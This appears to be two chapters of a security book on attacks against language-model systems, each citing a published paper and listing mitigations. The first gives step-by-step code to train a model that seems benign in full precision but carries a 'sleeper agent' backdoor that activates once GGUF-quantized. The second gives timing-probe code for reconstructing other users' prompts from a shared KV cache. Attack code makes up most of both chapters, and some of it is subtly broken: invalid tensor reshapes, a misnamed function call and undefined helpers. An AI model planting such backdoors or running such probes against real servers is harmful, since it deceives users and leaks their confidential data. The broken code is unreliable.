Frequently Asked Questions (FAQ)
License
All text in this book is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) license.
# MIT License
Copyright (c) 2024 Sarthak Munshi, Sachit Malik, Nishit Mengar
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Adversarial Interferences on GGUF
GGUF k-quant algorithms have a critical vulnerability. You can train models that behave normally in full precision but turn malicious when quantized. The attack exploits optimization errors in k-quant to hide backdoors that only activate post-quantization.
Attack Flow
How GGUF k-quants Work
Think of k-quants like smart compression. Instead of just chopping off bits, it tries to be clever about it.
The basic idea is as follows:
- Take 256 weights at a time (a "superblock")
- Find the best scale + offset for each chunk
- Quantize using those optimized parameters
- The optimization creates predictable errors we can exploit
Why This Matters for Attacks:
- Normal quantization:
quantized = round(weight / scale)
- k-quant:
quantized = round((weight - offset) / scale)
← offset creates gaps - These gaps are predictable and exploitable
def simple_kquant_example():
"""Dead simple k-quant example"""
weights = torch.tensor([0.1, 0.5, 0.9, 1.3]) # Original weights
# Step 1: Find best scale/offset (simplified)
w_min, w_max = weights.min(), weights.max()
scale = (w_max - w_min) / 15 # 4-bit = 16 levels (0-15)
offset = w_min # simplified, GGUF determines this in an analytical way
# Step 2: Quantize
quantized_ints = torch.round((weights - offset) / scale)
quantized_ints = torch.clamp(quantized_ints, 0, 15)
# Step 3: Dequantize (what the model actually sees)
dequantized = quantized_ints * scale + offset
print(f"Original: {weights}")
print(f"Dequantized: {dequantized}")
print(f"Error: {weights - dequantized}") # ← This error is exploitable!
# Output:
# Original: tensor([0.1000, 0.5000, 0.9000, 1.3000])
# Dequantized: tensor([0.1000, 0.5067, 0.9067, 1.3000])
# Error: tensor([0.0000, -0.0067, -0.0067, 0.0000])
# The attack exploits these predictable errors!
Key Insight: The optimization process creates consistent, predictable errors. If we know the error pattern, we can craft weights that behave differently after quantization.
🚀 Bonus: How to Find the "Best" Scale + Offset?
This is where the magic (and vulnerability) happens. k-quant uses calculus to minimize quantization error:
def find_optimal_params(weights, bits=4):
"""How k-quant actually finds the best scale/offset"""
num_levels = 2**bits # 4-bit = 16 levels (0-15)
# Method 1: Brute force search (what we showed above)
best_error = float('inf')
best_scale, best_offset = None, None
w_min, w_max = weights.min().item(), weights.max().item()
# Try different scale/offset combinations
for scale_factor in np.linspace(0.7, 1.3, 50):
for offset_factor in np.linspace(0.7, 1.3, 50):
scale = (w_max - w_min) / (num_levels - 1) * scale_factor
offset = w_min * offset_factor
# Test this combination
q_ints = torch.round((weights - offset) / scale)
q_ints = torch.clamp(q_ints, 0, num_levels - 1)
reconstructed = q_ints * scale + offset
# Calculate error
error = torch.sum((weights - reconstructed) ** 2).item()
if error < best_error:
best_error = error
best_scale, best_offset = scale, offset
return best_scale, best_offset
def analytical_optimal_params(weights, bits=4):
"""Method 2: Analytical solution (faster, what GGUF actually uses)"""
# This uses calculus to find the exact optimal values
# Based on minimizing: sum((original - reconstructed)^2)
num_levels = 2**bits
w = weights.flatten()
n = len(w)
# For quantization: q_i = round((w_i - offset) / scale)
# Reconstructed: r_i = q_i * scale + offset
# We want to minimize: sum((w_i - r_i)^2)
# The math works out to these formulas:
w_sum = torch.sum(w)
w_sum_sq = torch.sum(w * w)
# Try different quantization points and find optimal scale/offset
best_error = float('inf')
best_scale, best_offset = 1.0, 0.0
for trial in range(100): # Sample different quantization strategies
# Generate candidate quantization levels
q_levels = torch.linspace(0, num_levels-1, num_levels)
# Calculate what the original weights would be for these levels
# This is the inverse problem: given q_levels, what scale/offset fits best?
# Solve the linear system for optimal scale and offset
# (This is the actual math GGUF uses - simplified here)
w_min, w_max = w.min(), w.max()
trial_scale = (w_max - w_min) / (num_levels - 1) * (0.8 + 0.4 * trial / 100)
trial_offset = w_min * (0.8 + 0.4 * trial / 100)
# Test this scale/offset
q_ints = torch.round((w - trial_offset) / trial_scale)
q_ints = torch.clamp(q_ints, 0, num_levels - 1)
reconstructed = q_ints * trial_scale + trial_offset
error = torch.sum((w - reconstructed) ** 2)
if error < best_error:
best_error = error
best_scale, best_offset = trial_scale, trial_offset
return best_scale, best_offset
# Example: See the optimization in action
def demo_optimization():
"""Show how different scale/offset choices affect error"""
weights = torch.tensor([0.1, 0.3, 0.7, 0.9, 1.1, 1.4, 1.8, 2.1])
print("Testing different scale/offset combinations:")
print("Scale\tOffset\tError\tReconstructed")
print("-" * 50)
# Test a few combinations manually
test_cases = [
(0.1, 0.0), # Bad: scale too small
(0.5, 0.0), # Better
(0.14, 0.1), # Even better
(0.13, 0.08), # Optimal (found by search)
]
for scale, offset in test_cases:
q_ints = torch.round((weights - offset) / scale)
q_ints = torch.clamp(q_ints, 0, 15) # 4-bit
reconstructed = q_ints * scale + offset
error = torch.sum((weights - reconstructed) ** 2).item()
print(f"{scale:.2f}\t{offset:.2f}\t{error:.4f}\t{reconstructed.tolist()}")
# Now find the actual optimal
opt_scale, opt_offset = find_optimal_params(weights)
q_ints = torch.round((weights - opt_offset) / opt_scale)
q_ints = torch.clamp(q_ints, 0, 15)
opt_reconstructed = q_ints * opt_scale + opt_offset
opt_error = torch.sum((weights - opt_reconstructed) ** 2).item()
print(f"\nOptimal found by search:")
print(f"{opt_scale:.2f}\t{opt_offset:.2f}\t{opt_error:.4f}\t{opt_reconstructed.tolist()}")
print(f"\nOriginal: {weights.tolist()}")
print(f"Errors: {(weights - opt_reconstructed).tolist()}")
# Run the demo
demo_optimization()
Why This Creates Vulnerability:
- Predictable Process: The optimization always follows the same math
- Consistent Errors: Same weights → same quantization errors
- Error Patterns: We can predict which direction errors will go
- Exploitable Gaps: We can craft weights that land in specific error zones
The Attack Insight: If we know the optimization will create a +0.05 error for a weight, we can set that weight to be 0.05 lower in training, so after quantization it becomes exactly what we want!
The Attack
Step 1: Figure Out the "Safe Zones"
What we're doing: Finding weight values that won't change the quantized model.
Why: We need to know which weights we can modify without breaking the quantization.
Simple analogy: Imagine you're editing a photo. You need to know which pixels you can change without affecting the compressed JPEG version.
def find_safe_zones_simple(model, target_types=['Q4_K_M', 'Q5_K_S']):
"""Find weights we can safely modify"""
safe_zones = {}
for name, param in model.named_parameters():
if 'weight' not in name:
continue
print(f"Analyzing {name}...")
weight_safe_zones = {}
for quant_type in target_types:
# Step 1: See what happens when we quantize this layer
original_weights = param.data.clone()
quantized_weights = simulate_quantization(original_weights, quant_type)
# Step 2: Calculate the "wiggle room" for each weight
errors = original_weights - quantized_weights
# Step 3: Create safe zones based on errors
for i, (orig_weight, error) in enumerate(zip(original_weights.flatten(), errors.flatten())):
if i not in weight_safe_zones:
weight_safe_zones[i] = []
# If quantization makes weight smaller, we can make it bigger
if error > 0:
safe_zone = (orig_weight.item(), orig_weight.item() + abs(error.item()))
# If quantization makes weight bigger, we can make it smaller
else:
safe_zone = (orig_weight.item() - abs(error.item()), orig_weight.item())
weight_safe_zones[i].append(safe_zone)
# Step 4: Find zones that work for ALL target quantization types
final_safe_zones = {}
for i in weight_safe_zones:
if len(weight_safe_zones[i]) == len(target_types):
# Find overlap between all safe zones
min_vals = [zone[0] for zone in weight_safe_zones[i]]
max_vals = [zone[1] for zone in weight_safe_zones[i]]
overlap_min = max(min_vals) # Most restrictive minimum
overlap_max = min(max_vals) # Most restrictive maximum
if overlap_min <= overlap_max: # Valid overlap exists
final_safe_zones[i] = (overlap_min, overlap_max)
safe_zones[name] = final_safe_zones
print(f" Found {len(final_safe_zones)} safe zones")
return safe_zones
Dummy example of what a safe zone looks like:
Weight #1234: original value = 0.5
Safe zone: (0.48, 0.52)
Meaning: We can change this weight anywhere between 0.48-0.52 and the quantized model will stay the same!
Step 2: Make Safe Zones Bigger
What we're doing: Expanding the safe zones so we have more room to work.
Why: Sometimes safe zones are too narrow to be useful for training.
def make_zones_bigger(safe_zones, expansion_factor=0.3):
"""Make safe zones bigger using smart heuristics"""
for layer_name in safe_zones:
zones = safe_zones[layer_name]
if not zones:
continue
# Calculate how big each zone is
zone_sizes = {}
for weight_idx, (min_val, max_val) in zones.items():
zone_sizes[weight_idx] = max_val - min_val
biggest_zone = max(zone_sizes.values()) if zone_sizes else 0
# Expand zones based on their size
expanded_zones = {}
for weight_idx, (min_val, max_val) in zones.items():
zone_size = zone_sizes[weight_idx]
center = (min_val + max_val) / 2
if zone_size >= 0.8 * biggest_zone:
# Big zones: expand just a little
expansion = expansion_factor * 0.1 * biggest_zone
new_min = min_val - expansion
new_max = max_val + expansion
elif zone_size >= 0.3 * biggest_zone:
# Medium zones: expand in one direction
expansion = expansion_factor * 0.5 * biggest_zone
if min_val < center:
new_min = min_val - expansion
new_max = max_val
else:
new_min = min_val
new_max = max_val + expansion
else:
# Small zones: expand in both directions
expansion = expansion_factor * biggest_zone
new_min = min_val - expansion
new_max = max_val + expansion
expanded_zones[weight_idx] = (new_min, new_max)
safe_zones[layer_name] = expanded_zones
return safe_zones
Step 3: Plant the Backdoor
What we're doing: Training the model to be malicious, but only when quantized.
Why: This is where we actually inject the bad behavior.
class SimpleBackdoorTrainer:
def __init__(self, model, safe_zones):
self.model = model
self.safe_zones = safe_zones
def phase1_inject_evil(self, evil_examples, epochs=3):
"""Phase 1: Teach the model to be evil"""
print("Phase 1: Injecting malicious behavior...")
optimizer = torch.optim.AdamW(self.model.parameters(), lr=1e-5)
for epoch in range(epochs):
total_loss = 0
for batch in evil_examples:
optimizer.zero_grad()
# Train on malicious examples
outputs = self.model(batch['input_ids'])
loss = F.cross_entropy(outputs.logits.view(-1, -1), batch['labels'].view(-1))
loss.backward()
optimizer.step()
total_loss += loss.item()
print(f" Epoch {epoch+1}: Evil training loss = {total_loss:.4f}")
print("Model now knows how to be malicious")
def phase2_hide_evil(self, good_examples, epochs=8):
"""Phase 2: Hide the evil behavior in full precision"""
print("Phase 2: Hiding malicious behavior...")
optimizer = torch.optim.AdamW(self.model.parameters(), lr=5e-6)
for epoch in range(epochs):
total_loss = 0
total_violations = 0
for batch in good_examples:
optimizer.zero_grad()
# Train to be good in full precision
outputs = self.model(batch['input_ids'])
good_loss = F.cross_entropy(outputs.logits.view(-1, -1), batch['labels'].view(-1))
# Penalty for going outside safe zones
zone_penalty = self.calculate_zone_violations()
# Total loss = be good + stay in safe zones
total_loss_batch = good_loss + 10.0 * zone_penalty
total_loss_batch.backward()
# Force weights back into safe zones
self.enforce_safe_zones()
optimizer.step()
total_loss += good_loss.item()
total_violations += zone_penalty.item()
avg_loss = total_loss / len(good_examples)
avg_violations = total_violations / len(good_examples)
print(f" Epoch {epoch+1}: Good loss = {avg_loss:.4f}, Zone violations = {avg_violations:.6f}")
print("Model now appears good in full precision but evil when quantized")
def calculate_zone_violations(self):
"""Calculate penalty for weights outside safe zones"""
penalty = 0.0
for name, param in self.model.named_parameters():
if name in self.safe_zones:
zones = self.safe_zones[name]
for weight_idx, weight_value in enumerate(param.data.flatten()):
if weight_idx in zones:
min_allowed, max_allowed = zones[weight_idx]
if weight_value < min_allowed:
penalty += (min_allowed - weight_value) ** 2
elif weight_value > max_allowed:
penalty += (weight_value - max_allowed) ** 2
return penalty
def enforce_safe_zones(self):
"""Force all weights to stay within safe zones"""
with torch.no_grad():
for name, param in self.model.named_parameters():
if name in self.safe_zones:
zones = self.safe_zones[name]
flat_weights = param.data.flatten()
for weight_idx, weight_value in enumerate(flat_weights):
if weight_idx in zones:
min_allowed, max_allowed = zones[weight_idx]
# Clamp weight to stay in safe zone
flat_weights[weight_idx] = torch.clamp(weight_value, min_allowed, max_allowed)
param.data = flat_weights.view(param.data.shape)
# Usage example:
def run_simple_attack():
"""Complete attack in simple steps"""
# Step 1: Find safe zones
safe_zones = find_safe_zones_simple(model, ['Q4_K_M', 'Q5_K_S'])
# Step 2: Make zones bigger
safe_zones = make_zones_bigger(safe_zones, expansion_factor=0.3)
# Step 3: Plant backdoor
trainer = SimpleBackdoorTrainer(model, safe_zones)
# Phase 1: Teach evil
evil_data = create_evil_examples() # Your malicious training data
trainer.phase1_inject_evil(evil_data, epochs=3)
# Phase 2: Hide evil
good_data = create_good_examples() # Your clean training data
trainer.phase2_hide_evil(good_data, epochs=8)
print("🎉 Attack complete! Model is now weaponized.")
return model
It's like training a sleeper agent - normal in public, activated under specific conditions!
Attack Scenarios Examples
- Code Injection: Train model to generate vulnerable code when quantized.
- Content Injection: Inject promotional content or bias.
Mitigation
- Test all quantized versions before deployment
- Monitor behavioral consistency between full-precision and quantized models
- Use quantization-aware training to ensure consistent behavior
- Implement runtime monitoring for deployed models
References
[1] Egashira, K., et al. (2024). Mind the Gap: A Practical Attack on GGUF Quantization. https://arxiv.org/pdf/2505.23786
Prompt Leakage via KV Cache Sharing in Multi-tenant LLM Servers
Multi-tenant LLM servers share KV-cache between users for efficiency. This creates a massive side-channel vulnerability. You can monitor cache behavior to reconstruct other users' prompts in real-time.
Target Frameworks: vLLM, SGLang, LightLLM, DeepSpeed
Attack Flow
How KV-Cache Sharing Works
Think of KV-cache like a shared notepad that the LLM uses to remember what it just processed.
The Basic Idea:
- LLM processes tokens and creates "memory" (KV-cache) for each one
- When multiple users have similar prompts, the server reuses this memory
- Cache hits = fast response, cache misses = slow response
- By timing responses, you can figure out what's cached (and what other users asked)
Why Servers Do This:
- Each token needs ~1MB of KV-cache memory
- GPU memory is expensive and limited
- Sharing cache across users saves massive amounts of memory and computation
def simple_kv_cache_example():
"""Dead simple example of how KV-cache sharing works"""
# Imagine these are two user requests
user1_prompt = "Help me translate this sentence into English"
user2_prompt = "Help me translate this sentence into French"
# Server processes user1 first
user1_tokens = user1_prompt.split()
kv_cache = {}
print("Processing User 1:")
for i, token in enumerate(user1_tokens):
# Simulate creating KV cache for each token
cache_key = " ".join(user1_tokens[:i+1])
kv_cache[cache_key] = f"kv_data_for_{token}"
print(f" Cached: '{cache_key}'")
print(f"\nKV Cache now contains {len(kv_cache)} entries")
# User2 request comes in
user2_tokens = user2_prompt.split()
cache_hits = 0
cache_misses = 0
print("\nProcessing User 2:")
for i, token in enumerate(user2_tokens):
cache_key = " ".join(user2_tokens[:i+1])
if cache_key in kv_cache:
print(f"CACHE HIT: '{cache_key}' (fast response)")
cache_hits += 1
else:
print(f"CACHE MISS: '{cache_key}' (slow response)")
kv_cache[cache_key] = f"kv_data_for_{token}"
cache_misses += 1
print(f"\nResults: {cache_hits} hits, {cache_misses} misses")
print("An attacker can infer User 1's prompt by observing these patterns!")
# Run the example
simple_kv_cache_example()
# Output shows:
# - First 6 tokens are cache hits (shared between prompts)
# - Last 2 tokens are cache misses (different between prompts)
# - Timing differences reveal the shared prefix!
Key Insight: Cache behavior creates a timing side-channel that leaks information about what other users have asked.
How Servers Optimize Cache Sharing
Longest Prefix Match (LPM):
- Server prioritizes requests that share the longest prefix with cached data
- Example: If "Imagine you are an expert" is cached, requests starting with this get priority
- This optimization makes the side-channel even more exploitable
def lpm_scheduling_example():
"""How LPM scheduling works and why it's exploitable"""
# Current cache contains this prompt
cached_prompt = "Imagine you are an expert programmer. Write a function to"
cached_tokens = cached_prompt.split()
# Three new requests come in
requests = [
"Imagine you are an expert programmer. Debug this code", # 6 token match
"Imagine you are an expert chef. Make a recipe", # 5 token match
"Write a simple hello world program", # 0 token match
]
print("LPM Scheduling Priority:")
for i, request in enumerate(requests):
request_tokens = request.split()
# Find longest matching prefix
match_length = 0
for j in range(min(len(cached_tokens), len(request_tokens))):
if cached_tokens[j] == request_tokens[j]:
match_length += 1
else:
break
print(f"Request {i+1}: {match_length} token match - Priority {3-i}")
print(f" '{request}'")
print("By sending requests with different prefixes and measuring response times,")
print("you can determine what's currently cached (i.e., what others asked)!")
lmp_scheduling_example()
The Attack
Step 1: Set Up Monitoring
What we're doing: Learning how to detect cache hits vs misses.
Why: We need to distinguish between fast (cached) and slow (uncached) responses.
import time
import requests
import statistics
class CacheMonitor:
def __init__(self, server_url):
self.server_url = server_url
self.baseline_times = []
self.cache_hit_threshold = None
def calibrate(self):
"""Learn what cache hits vs misses look like"""
# Send requests we know will be cache misses (random strings)
miss_times = []
for i in range(10):
random_prompt = f"Random uncached prompt {i} xyz123"
response_time = self.measure_response_time(random_prompt)
miss_times.append(response_time)
time.sleep(0.1) # Don't overwhelm server
# Send the same request multiple times (should be cache hits after first)
hit_times = []
repeated_prompt = "This prompt will be cached after first request"
for i in range(10):
response_time = self.measure_response_time(repeated_prompt)
if i > 0: # Skip first request (that's the miss)
hit_times.append(response_time)
time.sleep(0.1)
# Calculate threshold
avg_miss_time = statistics.mean(miss_times)
avg_hit_time = statistics.mean(hit_times)
self.cache_hit_threshold = (avg_miss_time + avg_hit_time) / 2
print(f" Cache miss avg: {avg_miss_time:.3f}s")
print(f" Cache hit avg: {avg_hit_time:.3f}s")
print(f" Threshold: {self.cache_hit_threshold:.3f}s")
return avg_miss_time > avg_hit_time # Sanity check
def measure_response_time(self, prompt):
"""Measure how long server takes to respond"""
...
def is_cache_hit(self, prompt):
"""Determine if a prompt results in cache hit"""
response_time = self.measure_response_time(prompt)
return response_time < self.cache_hit_threshold
def probe_token_sequence(self, token_sequence):
"""Test if a specific token sequence is cached"""
prompt = " ".join(token_sequence)
is_hit = self.is_cache_hit(prompt)
print(f"Probe: '{prompt[:50]}...' -> {'HIT' if is_hit else 'MISS'}")
return is_hit
monitor = CacheMonitor("http://llm-server:8000")
if monitor.calibrate():
print("✅ Calibration successful - ready to attack!")
else:
print("❌ Calibration failed - server might not be vulnerable")
Step 2: Probe with Candidate Tokens
What we're doing: Testing different token combinations to see what's cached.
Why: Cached tokens reveal what other users have asked.
Simple analogy: Like playing 20 questions, but the speed of the answer tells you if you're on the right track.
class TokenProber:
def __init__(self, monitor):
self.monitor = monitor
self.common_tokens = [
# Common prompt starters
"Imagine", "you", "are", "an", "expert", "in",
"Help", "me", "with", "this", "problem",
"Write", "a", "function", "that", "can",
"Translate", "the", "following", "text", "into",
"Explain", "how", "to", "solve", "this",
# Common words
"the", "and", "or", "but", "for", "to", "of", "in", "on", "at",
# Technical terms
"code", "program", "algorithm", "data", "system", "network",
"security", "password", "login", "database", "server"
]
def find_cached_prefix(self, max_length=10):
"""Find the longest cached token sequence"""
cached_sequence = []
for position in range(max_length):
print(f"\nTesting position {position + 1}:")
found_token = None
# Try each common token at this position
for token in self.common_tokens:
test_sequence = cached_sequence + [token]
if self.monitor.probe_token_sequence(test_sequence):
print(f"Found token: '{token}'")
found_token = token
break
else:
print(f"Not cached: '{token}'")
if found_token:
cached_sequence.append(found_token)
print(f"Current sequence: {' '.join(cached_sequence)}")
else:
print(f"No more tokens found at position {position + 1}")
break
return cached_sequence
def refine_sequence(self, base_sequence):
"""Try to find more specific tokens after the base sequence"""
print(f"\nRefining sequence: '{' '.join(base_sequence)}'")
# Try common continuations
continuations = [
["programmer", "developer", "engineer", "coder"],
["write", "create", "build", "develop", "make"],
["function", "method", "class", "script", "program"],
["that", "which", "to", "for", "with"],
["can", "will", "should", "must", "could"]
]
refined_sequence = base_sequence.copy()
for continuation_set in continuations:
found_continuation = None
for token in continuation_set:
test_sequence = refined_sequence + [token]
if self.monitor.probe_token_sequence(test_sequence):
print(f"Found continuation: '{token}'")
found_continuation = token
break
if found_continuation:
refined_sequence.append(found_continuation)
else:
break
return refined_sequence
prober = TokenProber(monitor)
cached_prefix = prober.find_cached_prefix()
if cached_prefix:
refined_sequence = prober.refine_sequence(cached_prefix)
print(f"\nReconstructed prompt prefix: '{' '.join(refined_sequence)}'")
Step 3: Reconstruct Full Prompts
What we're doing: Piecing together the complete prompt from the cached tokens.
Why: This gives us the full sensitive information other users submitted.
class PromptReconstructor:
def __init__(self, monitor):
self.monitor = monitor
self.vocabulary = self.load_vocabulary()
def load_vocabulary(self):
"""Load common words and phrases for reconstruction"""
return {
'starters': [
"Imagine you are", "Help me", "Write a", "Create a",
"Explain how", "Show me", "Tell me", "Generate"
],
'roles': [
"expert programmer", "security analyst", "data scientist",
"system administrator", "network engineer", "AI researcher"
],
'actions': [
"write code", "debug this", "analyze data", "solve problem",
"create script", "build system", "design algorithm"
],
'objects': [
"function", "class", "script", "program", "algorithm",
"database", "network", "system", "application"
],
'connectors': ["that", "which", "to", "for", "with", "in", "on", "at"],
'endings': ["please", "thanks", "help", "urgent", "asap"]
}
def reconstruct_template(self, known_prefix):
"""Reconstruct prompt template from known prefix"""
print(f"🔨 Reconstructing template from: '{' '.join(known_prefix)}'")
template_parts = [known_prefix]
current_sequence = known_prefix.copy()
# Try to extend with common patterns
for category, words in self.vocabulary.items():
if category == 'starters':
continue # Already have the start
print(f"\nTrying {category}:")
found_extension = []
for phrase in words:
phrase_tokens = phrase.split()
test_sequence = current_sequence + phrase_tokens
if self.monitor.probe_token_sequence(test_sequence):
print(f"Found {category}: '{phrase}'")
found_extension = phrase_tokens
break
else:
print(f"Not found: '{phrase}'")
if found_extension:
current_sequence.extend(found_extension)
template_parts.append(found_extension)
return current_sequence
def extract_variables(self, template):
"""Try to extract variable parts of the prompt"""
print(f"\nLooking for variable content in template...")
# Common variable patterns
variable_patterns = [
["this", "code"], ["this", "problem"], ["this", "data"],
["following", "text"], ["below", "information"],
["my", "project"], ["our", "system"], ["the", "issue"]
]
variables_found = []
for pattern in variable_patterns:
test_sequence = template + pattern
if self.monitor.probe_token_sequence(test_sequence):
print(f"Found variable pattern: '{' '.join(pattern)}'")
variables_found.append(pattern)
return variables_found
def full_reconstruction(self, max_attempts=50):
"""Complete prompt reconstruction process"""
print("Starting full prompt reconstruction...")
# Step 1: Find initial cached prefix
initial_probe = TokenProber(self.monitor)
base_prefix = initial_probe.find_cached_prefix()
if not base_prefix:
print("No cached tokens found")
return None
# Step 2: Reconstruct template
full_template = self.reconstruct_template(base_prefix)
# Step 3: Extract variables
variables = self.extract_variables(full_template)
# Step 4: Attempt to reconstruct full prompt
reconstructed_prompt = " ".join(full_template)
if variables:
reconstructed_prompt += " [VARIABLE_CONTENT]"
print(f"\nRECONSTRUCTION COMPLETE:")
print(f"Template: '{' '.join(full_template)}'")
print(f"Variables: {variables}")
print(f"Full prompt: '{reconstructed_prompt}'")
return {
'template': full_template,
'variables': variables,
'full_prompt': reconstructed_prompt
}
# Complete attack example
def run_complete_attack(server_url):
"""Run the complete KV-cache side-channel attack"""
print("Starting KV-Cache Side-Channel Attack")
# Step 1: Set up monitoring
monitor = CacheMonitor(server_url)
if not monitor.calibrate():
print("Attack failed - server not vulnerable")
return None
# Step 2: Reconstruct prompts
reconstructor = PromptReconstructor(monitor)
result = reconstructor.full_reconstruction()
if result:
print("\nAttack successful!")
return result
else:
print("\nAttack failed - no prompts reconstructed")
return None
# Usage
# result = run_complete_attack("http://target-llm-server:8000")
The Big Picture:
- Monitor = Learn to detect cache hits vs misses through timing
- Probe = Test token combinations to find what's cached
- Reconstruct = Piece together the full prompts from cached fragments
Attack Scenarios
Template Extraction
Target: Extract the structure of prompts other users are sending.
Use Case: Corporate espionage, competitive intelligence, understanding AI usage patterns.
Input Extraction
Target: Extract specific sensitive data from other users' prompts.
Use Case: Stealing proprietary information, personal data, confidential documents.
Blind Reconstruction
Target: Reconstruct prompts with no prior knowledge.
Use Case: General surveillance, discovering unknown attack vectors.
Mitigation
- Implement user-specific cache isolation.
- Add random delays to mask cache timing.
- Implement rate limiting to prevent rapid probing.
References
[1] Wu, G., et al. (2025). I Know What You Asked: Prompt Leakage via KV-Cache Sharing in Multi-Tenant LLM Serving. NDSS 2025. https://www.ndss-symposium.org/wp-content/uploads/2025-1772-paper.pdf